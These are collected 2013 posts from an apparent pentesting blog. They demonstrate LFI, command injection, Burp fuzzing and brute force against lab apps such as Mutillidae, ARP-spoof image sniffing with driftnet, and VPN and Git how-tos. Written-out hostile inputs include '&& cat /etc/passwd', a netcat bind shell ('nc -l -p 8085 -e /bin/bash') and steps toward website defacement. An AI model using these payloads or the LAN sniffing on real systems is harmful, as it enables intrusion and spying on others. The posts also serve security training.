Thursday, October 17, 2013

Local PHP File Inclusion Vulnerability Example | Web Applications Hacking | How To | LFI PHP

Written by Pranshu Bajpai |  | LinkedIn

The vulnerability lies in how web pages are invoked on a web server. If an absolute path or direct referencing is used then it is possible to invoke pages on the server that a hacker has no business seeing.

You can read up on the theory here.

How To Exploit Local PHP File Inclusion Vulnerability on a Web Server | Mutillidae

Attacked Server: 1. Mutillidae  2. Net-force
Vulnerable Page: /mutillidae/index.php?page=
Attack Type: Local PHP File Inclusion


A hacker notices that a GET Parameter 'page' is used to 'include' pages residing on a web server.

We know the web server is running on a Linux system. So we try to invoke the password file in Linux by specifying it's absolute path:

page=/etc/passwd



If the web server was running on Windows system we could test the same trying to invoke:

page=C:\\boot.ini

The contents of the file would be displayed on the screen if Local File Inclusion exists:



Notice the Password Hash for the user 'NetForce'. This can be cracked by johntheripper [JTR]

Such attacks can be avoided by not using absolute paths while referencing web pages on servers or using if-else structures to call specific pages only or encoding the attackers request (/etc/passwd)

How To Test Cookie / Session ID Randomness Using Burp Suite Sequencer

Written by Pranshu Bajpai |  | LinkedIn

When you log on to a web server, a session is created which is identified by a session ID. The session identifier can be a cookie. This cookie holds the session ID so that one can log in once for each session (From there on, the session is then passed on to various web pages one browses on that server). Read up on Session Management.

Session, hence, depends on the session ID. In PHP, the 'PHPSESSID' holds the session ID when you visit a webpage on the server.

This needs to be random enough to preserve the security of the session. If an attacker is able to estimate what the session ID is going to be, he/she can bypass authentication.

Test for Randomness of the Session ID / PHPSESSID / Cookie | Mutillidae

Attacked Server: Mutillidae
Test Page: Main Login Page
Test Parameter: PHPSESSID
Test Type: Session Randomness

1. Load up the web page on the server and intercept the request in Burp Proxy. Now notice the server sets the PHPSESSID. Delete this and forward the request to server.

The server notices the mission PHPSESSID and sets a new ID.

Now delete this and right click 'Send to Sequencer'



2. In the sequencer make sure PHPSESSID is highlighted for testing and being the test > 'Start live capture'

3. The test will keep grabbing new tokens and then analyze this sample data for randomness.

For accurate results wait until sample size is at least 200 tokes


Then click 'Analyze Now'

Notice the Entropy is 121 bits which is 'excellent' (Entropy refers to the randomness)

So this test ensures the unpredictability of the Session ID

Fuzz Testing Web Applications With Burp Suite | Burp Intruder [Sniper] to Fuzz Parameters

Written by Pranshu Bajpai |  | LinkedIn

IronGeek made a lot of good videos about testing web applications with Burp Suite. I tested these attacks out myself.

Attacked Server: Mutillidae
Test Page: Main Login Form
Test Parameter: Username
Test Type: Fuzzing

In simple words, fuzzing means sending "weird" data to the server and observing how it reacts to it. More formal explanation can be found here.

Fuzz Testing Login Form Parameters using Burp Suite | Mutillidae



1. Enter any username on the web page, press enter and intercept the request in Burp Proxy. Then send it to "Intruder"

2. Select the "sniper" attack type in Intruder and select the username parameter to be fuzzed [marked by $..$]


3. Now time to set the 'Payload', that is, what that "weird" data is going to be. For test purposes, I used a simple list where I inserted payload manually. You can use various fuzz lists available on the Internet.

4. Notice one of the fuzz payloads is '


5. Click Start Attack. And after it finishes notice the server response page. HTTP Codes are '200 OK'. And the length of the returned pages (server response) is of interest.

Almost all response page lengths are the same, except the one for the payload '

'Render' this page in Burp and you will see that the page is greater in length because it returns additional error lines (database error, SQL injection attacks possible)

So the fuzz test revealed possible SQL injection on the login form on parameter 'Username'

Directory Browsing Vulnerability | Directory Listing / Traversal Attack | How To | Demo [Screenshots] | Mutillidae

Written by Pranshu Bajpai |  | LinkedIn

As a web application penetration tester, when you find directory browsing enabled on a web server, you include it in your report, but you know exploiting it is a long shot.

The main threat lies in the fact that the attacker can view all the files present on the web directory. This might include PHP files (or files in other web languages). If the attacker is dedicated enough, he will read these PHP codes to figure out a way to circumvent security.

Directory Browsing Vulnerability in Mutillidae




An attacker can review the code behind these PHP scripts to find potential weaknesses




Driftnet Tutorial | How to Sniff Images with Driftnet + Arpspoof / Ettercap | Kali Linux / Backtrack

Written by Pranshu Bajpai |  | LinkedIn

If you're on a shared LAN and you are curious to know what kind of images people are searching for over the web on your Local LAN, you can use Driftnet.

For a penetration tester, there's no direct point of doing this, but since I tested this, I thought I might as well make a post about it. As a network administrator who is enforcing a policy on what kind of images are being searched on the local network, this might come in handy to see what images people are viewing at any time.

How to Sniff Images using Driftnet | ARP Spoofing with Arpspoof or Ettercap in Kali Linux

If you are learning, it is better to use Arpspoof to do the spoofing since it's a manual command line tool and if you set up the man in the middle attack in this manner, it will aid your learning.

1. Enable IP forwarding
#echo 1 >> /proc/sys/net/ipv4/ip_forward
2. Use Arpspoof on the desired interface [eth0] to spoof local switch's MAC to your own for a particular Victim IP in the network [see Figure below]



Victim machines now think you are the switch, hence all packets destined for the switch arrive on your machine.

3. Use Arpspoof to spoof the victim's MAC to your own for the switch on the network.



Traffic from switch destined to the victim's IP now arrives on your machine.

You are now acting as the "man in the middle"

4. Fire up driftnet. If you've done it all right, you should see the images




Looks like someone's hunting for a new dress.

Using Ettercap to perform the ARP Spoof


This is a GUI tool, and ARP Spoofing using Ettercap is simply point and click a few times. There are several tutorials on it on the web, so I am not covering that. But the concept is the same Man in the Middle Attack.


Wednesday, October 9, 2013

'remindme.py' A Simple Python Script To Remind You About Events That You Want To Remember | Pranshu

Written by  | Google+ Pranshu Bajpai | LinkedIn

This is a simple Linux utility that I coded long ago for personal use that would remind me about events that I want to remember. It reminds you of a given event on a certain data after you log onto your computer on that date.

This is a basic script in Python. Please feel free to improve it to suit your particular needs.

Functionality:

-Displays a Graphical Notification in Top Right Corner Each Time you Login
-You Manually Enter Events and Corresponding dates

How to Use:

Create a Folder called "python codes" in your root directory and place "remindme.py" there

(Path is hard coded in the script. This is bad coding, but I was in a hurry. Like I said, feel free to improve the code)

Create a File in this folder called "remindme.data"

Enter the Dates and Events in this format and Save:

MonthDay Event
Example for 10th of Oct:
1010 EventName



Add remindme.py to 'Startup'  (Applications -> System Tools -> Preferences -> Startup)



(I have added a module for 'Auto-Add to Startup' but it was giving issues, so I commented it out, feel free to correct that)

Each Time you login now, remindme will check the remindme.data file and see if there's an Event listed for today. If an event is listed, it will display a notification:




If you're new to Python you might like to read the code:

#!/usr/bin/python

import time       #for checking current date
import gtk.gdk    
import pynotify   #For Notifications

today = time.strftime("%m%d")
Remind_Me_Path = "python /root/python\ codes/remindme.py"  #Path to script


#Following Function that checks whether Startup Entry is already made
#Coz We don't want multiple startup entries made, everytime program runs

def check_startup_entry():                   
 flag = 0
 file = open ("/root/.bash_profile", 'r')
        for line in file:
                if Remind_Me_Path in line:
   flag = 1
 if flag == 0:
  add_to_startup()  

#Following Function adds the startup entry if it check_startup didn't find one

def add_to_startup():
 file = open ("/root/.bash_profile", 'a+')
 file.write(Remind_Me_Path)
 file.write("\n")
 file.close() 

#Following Function checks for Events in Remind_Me.data file

def check_for_event():
 file = open ("/root/python codes/remindme.data", 'r')
 for line in file:
  if today in line:
   notify(line)
 file.close()


#Following Function is called by check_for_event for notification

def notify(arg):
 pynotify.init("Basic")
 n = pynotify.Notification("Remind_Me: " + arg)
 n.set_hint('x', gtk.gdk.screen_width()/2.)
 n.set_hint('y', gtk.gdk.screen_height()/2.)
 n.show()

check_startup_entry()
check_for_event()

Web Applications Authentication Brute Force | Practical Demo [Screenshots] | Brute Force Website Login | How To

Written by  | Google+ Pranshu Bajpai | LinkedIn

This post is meant to elucidate  web application brute forcing by providing a practical demo.

Read up on Authentication Brute Force here.

OWASP testing guide is your friend in Web Application Hacking.

How To Brute Force Website Login | Web Application Hacking Example | Authentication Brute Force


We have a 'Test' website running on 172.19.17.120. I have created a Test account on it with username 'pranshu' and password 'p'. (As we are playing the part of a penetration tester, during the test we will assume we do not know the password)

It has a login form requiring a 'username' and 'password'. HTTP POST Request Parameters are used.

Set up Burpsuite Proxy to intercept traffic between your browser and the server page you will be trying to brute force [Read up on Burpsuite]



Then send these to Burpsuite 'Intruder' to be attacked

The attack we will use is 'Cluster Bomb'

The highlighted parameters in the image above are the ones which will be bruteforced.

In case you already know 'username', "un-highlight" it, meaning Brute Force Password only. Since I already know the username is 'pranshu', I will try to brute force the password and set username as 'pranshu'



Payload type is a 'simple list' of characters 'a,b,c,d....z'  [which we will use as possible passwords]

Execute the attack. It will set the username to 'pranshu' and go through the 'simple list', trying every possible alphabet as password. All will recieve HTTP code 200 (OK)






Except one where the payload was set to 'p'. It received HTTP code 302 (Redirect)

If you know HTTP codes you know that 302 (Redirect) means that the webpage is trying to send us to another page. As a penetration tester, I would guess that the re-direction is occurring because of successful login (redirect to 'Home' page or something)

To verfiy this, I 'render' the 'response' in Burp suite and sure enough I see I am logged in as user 'pranshu'.

In this case, I have used BurpSuite but you can use 'Brutus' or 'Hydra' for such online brute force password cracking.

Command Injection Attack Example [Screenshots] | Web Applications Hacking | Using Kali Linux

Written by  | Google+ Pranshu Bajpai | LinkedIn

Read up on command injection here.

OWASP testing guide is your best friend while learning web applications hacking or penetration testing.

I tested the attack on two different vulnerable applications, one of which is 'Mutillidae'


Command Injection Attack Example

Ideally, you are supposed to 'lookup' DNS and resolve hostnames to IP addresses using this web application.

However, the code is vulnerable to 'command injection attack'.

As you know, in Bash we can execute two commands one after the other by typing:

#cmd1 && cmd2

Try this in the vulnerable application (the point is to get another command executed on the server)

www.facebook.com && ls /

In the vulnerable application first Facebook's IP address would be resolved on the server and then the second command would get executed, listing the contents of the 'root' directory.



Now that you know the command injection vulnerability exists, you can try different commands and construct an attack

For example:

Display the contents of 'passwd' file

www.facebook.com && cat /etc/passwd

OR invoke netcat to listen for commands on port 8085 of the victim machine:

www.facebook.com && nc -l -p 8085 -e '/bin/bash'



See what we did here?

I assume netcat utility would be present on the server, so I tell it to listen on port 8085 (and invoke bash)

Now from our Terminal we can use our netcat client to connect to that server

#nc 172.X.X.X 8085

We are connected. We can now begin executing commands on the compromised remote machine.

#whoami



Note that we are a normal user--'www-data'--and not root. Hence, we have limited Privileges at this point.

However, using privileges of 'www-data' it is possible for us to deface the website. Note that defacing a website is unacceptable even as part of a penetration test, so do not go through with it.

To deface the website

#vi /var/www/index.html

It is now possible to edit this file to make changes to deface to the website.

Note that you can terminate the first command simply by typing ';' and, hence, don't always need the first part, that is, 'www.facebook.com'. For example:

; cat /etc/passwd

Quick Github Tutorial For Beginners | Using Git In Linux | Kali Linux, Ubuntu, Debian, Backtrack | How To

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

This is not meant to be an exhaustive tutorial. This does not discuss the concepts of Git that you should know (like working directory, staging area, head). This is a very quick demonstration of how to get started.

Quick Github Tutorial Or How To use Git in Linux


1. Visit Github

2. Make an Account.

3. Create a New Repository (of your current coding project)

4. Initial Git Setup (in your Terminal):

#git config --global user.name "lifeofpentester"
#git config --global user.email "......pranshu@gmail.com"
#git config --global credential.helper cache

If you use a Proxy Server to connect to the Internet:
#git config --global http.proxy http://user:pass@proxyserver:port

After you've configured the git global settings, you can check them:

#git config --list 



4. In your Terminal:

Navigate to the folder where your current project files reside and:

#git init
#git add .                                                                              #to add all files

OR

#git add huntpass.py                                                           #to add a particular file

OR

#git add '*.py'                                                                      #to add all files of a specific type

#git commit -m "Initial Commit"
 #git status

Now, we need to 'push' these changes to the remote location:

#git remote add origin https://github.com/lifeofpentester/huntpass.git
#git push -u origin master

Note: You might come across the error that says 'Fatal: remote origin already exists'. In this case, you need to remove that origin first. For this, you can use the following command:
#git remote rm origin
Fire up your browser and goto https://github.com and login

Under profile, click 'Repos' and visit the repository.

If you have done it all right this Repo will now reflect the "pushed" files


Monday, October 7, 2013

Index Page '/'

Sunday, October 6, 2013

How to Setup VPN on Android Phone or Tablet | Easy Step by Step Instructions | Screenshots included

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

In my previous posts, I have mentioned:

How to set up VPN connection on Windows

And

How to configure VPN connection in Linux.

In short, reasons for setting up VPN services are: anonymous surfing and downloading, security, privacy and defeating unreasonable censorship. Also Read this.

How to Configure / Setup VPN Connection in Android Device 

1. Goto 'Google play store' in the android device and download 'OpenVPN' application.

2. Subscribe to a VPN service. I use AirVPN. (You can also find free VPN servers if you do not wish to pay. However, there may be some bandwidth restrictions with free VPNs)

3. Login to the VPN service online and locate 'Generate Configuration files'. Choose 'Android Device'.




4. Download the .opvn and proxyauth files (Proxyauth is needed if your local network (proxy) requires authentication)

5. On the android device, open 'openVPN' --> 'settings' --> 'Import' --> Choose the location of the downloaded opvn file and 'Import' it.

6. Make sure your 'WiFi' is turned on and goto 'openVPN' --> Connect


You will now see that openVPN is connected.

Here are a couple of images of downloading torrents while on an openVPN network on an android device


Disclaimer: I do not endorse downloading files for free through P2P clients. These images were meant to be educational only.

VPN Configuration / VPN Client in Windows 7 / Windows 8 / Windows xp | How to set up | Anonymous Internet | Creating VPN Secure Connection

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

In my previous post, I have mentioned the reasons for using VPN and how to install or configure it in Linux.

The process becomes even simpler in the case of Windows.

How to set up / configure VPN connection in Windows

1. Subscribe to a VPN service provider. I have subscribed to AirVPN.

2. Locate 'VPN Configuration Generator' and choose 'Windows' as Operating System.



3. Download the .opvn file and .proxyauth file (in case your local network (proxy) is using Authentication)


4. Goto OpenVPN website --> 'Community' and download 'OpenVPN Client'

5. Install OpenVPN client. Then Goto programs --> OpenVPN --> Config

This should open the 'config' folder. Paste the downloaded .opvn and .proxyauth files there.

6. Run the OpenVPN client. Right Click the 'icon' in right corner below ; choose VPN Server and 'connect'



You should now see a window where VPN is self-configuring according to the information in the .opvn file.

After it finishes, you will notice a new connection with a new IP (Notice a private IP address).


In the 'cmd' terminal, type 'ipconfig' and you should now see the new connection and its IP.


Remove any local proxy settings from the browser and connect to the Internet. You should now be connected through a VPN tunnel.



VPN Configuration / VPN Client in Kali Linux / Debian / Ubuntu / Backtrack | How to | Anonymous Internet | VPN Secure Connection

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

As a penetration tester, I have a variety of concerns while using the Internet:

1. Security: While I work as a penetration tester for remote clients, I like to make sure my "tunnel" to the internet is free from eavesdroppers and is reasonably secure. VPN tunneling takes care of that.

2. Anonymity: All of us need  privacy and anonymity for one reason or another. VPN servers allow that by 'not storing' logs of usage on their servers.

3. Over-blocking and "Internet-usage Policies": ISPs and local network administrators can get overzealous about restricting user activity on their networks (this is specially so for college and office networks). The network that I use takes pride in blocking categories like "file transfer" and "hacking". On several occasions, I have a legitimate need for visiting a hack forum or a "file transfer" service since most email providers don't allow 'attachments' to go over 25 - 30 MB.

(By the way, you can also use TOR for anonymity and unblocking websites. I have written about how to use TOR in Kali Linux here)

How to set up / configure VPN in Linux:

Step 1. Subscribe to a VPN Service. I have subscribed to AirVPN (around $9 a month)

Step 2. Login to the VPN service provider's website (AirVPN in my case) and locate 'Generate Configuration file'




Step 3. Download the .opvn file

Additionally, a .proxyauth file will be provided if a proxy authentication is required in your local network proxy (see HTTP code 407)

Step 4. In Terminal type:

             #apt-get install openvpn
             #openvpn --version
             #openvpn --config <file_you_downloaded.opvn>


This should configure that VPN.

            #ifconfig



Notice the presence of a new interface 'tun0', along with its IP address (a private IP address provided by the VPN network).

Now remove any local proxy setting you might be using in your browsers or system and connect to the Internet through the VPN tunnel.



How to Install New Cool / Hacker Fonts in Kali Linux / BackTrack / Debian

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

Are you looking to install new cool "HaX0r" fonts on your Linux distro?

My Advice: Don't

Reason: Most of the "hacker" fonts out there are illegible and not suitable for the long hours that you might be spending typing on Terminals as a penetration tester.

Here's how to install a new font in Linux:


Step 1: Download a .ttf font from the Internet. Google it, you will find many. As I have stressed before, avoid "cool hacker" fonts. Look for something comfortable to read.

Step 2.

        #gnome-font-viewer <font_location_on_drive>


(Notice the illegibility of the font)

Step 3. Install font




That's it. The new font will now show up in your 'Set Font' option in Terminal 'Preferences' or wherever you need to use it.

Given below are a couple of images of fonts that were too "Kewl" or "Elite" for me to use. I uninstalled them immediately.